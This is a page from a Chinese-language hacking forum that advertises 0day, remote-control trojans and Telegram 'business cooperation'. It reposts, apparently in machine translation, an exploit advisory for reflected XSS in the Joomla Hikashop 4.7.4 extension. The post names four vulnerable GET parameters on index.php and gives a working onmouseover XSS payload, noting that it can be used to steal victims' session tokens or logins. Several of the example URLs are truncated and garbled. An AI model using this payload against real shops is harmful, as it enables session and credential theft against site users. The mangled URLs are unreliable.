[ 主页 ]  [ 隐私策略 ]  [ 0day ]  [ 业务合作 ]  [ 获得金币 ]  [ 项目开发 ]  [ 渗透 ]  [ 逆向破解 ]  [ faq ]  [ 联系我们 ]  [ 远控木马 ]  [ 合作方式 ]    用户: 39601     
Telegram联系我们
H

Joomla Hikashop 4.7.4-反映XSS

H

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题: JOOMLA HIKASHOP 4.7.4-反射XSS
#利用作者:饼干
#日期: 24/07/2023
#vendor: hikari软件团队
#供应商homepage3360 https://www.hikashop.com/
#软件link: https://demo.hikashop.com/index.php/en/
#JOOMLA扩展Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/hikashop/
#版本: 4.7.4
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
攻击者可以将电子邮件或即时消息中包含恶意URL的链接发送给受害者
可以执行各种各样的动作,例如窃取受害者的会议令牌或登录凭据
PATH: /INDEX.PHP
获取参数'From_option'很容易受到RXSS的影响
https://website/index.php?option=co...awfilter=1module_id=102cid=2from_option=[xss] from_ctrl=from_ctrl=productfrom_task=listingfrom_task=listingfrom_itemid=103
PATH: /INDEX.PHP
获取参数'from_ctrl'很容易受到RXSS的影响

正在加载...

demo.hikashop.com
PATH: /INDEX.PHP
获取参数'From_task'很容易受到RXSS的影响
https://demo.hikashop.com/index.php...option=hikashopfrom_ctrl=prododoductfrom_task] 33 from_option=fom_option=fom_opt
PATH: /INDEX.PHP
获取参数'From_itemid'很容易受到RXSS的影响
https://demo.hikashop.com/index.php...m_hikashopfrom_ctrl=prom_ctrl=prom_cprom_task [listsiffrom_task]
[XSS有效载荷] : uhqum'onmouseover='alert(1)'style='位置:absolute; width:100%;高度:100%; top:0; top:0; left:0; left:0;'wcn46;'wcn46
[-] 完毕
 
H
10月CMS v3.4.4-存储的跨站点脚本(XSS)(认证)
H
Perch v3.2-持续的跨站点脚本(XSS)
点击展开...
好评 0 否决票
您必须登录或注册才可回复。
相似主题 热门帖子 查看更多

Partner Website 友情鏈接 : 臺灣駭客團隊論壇 全球最大的中文黑客论坛 한국 해커 팀 포럼 dark Web hacking team 骇客团队 HACKER.BZ UKhacker
暗网黑客论坛网站:声明,本网站的教程、文章、工具和其他相关内容仅供学习和研究使用,旨在提高公众的网络安全意识和防护能力。
我们强烈反对任何形式的非法活动,禁止未经授权的入侵、攻击、破坏他人的网络系统等行为。
Copyright © 2013-2025 HACK 您可以联系我们的Telegram进行业务合作: @HackAptTeam  网站地图Sitemap
后退
顶部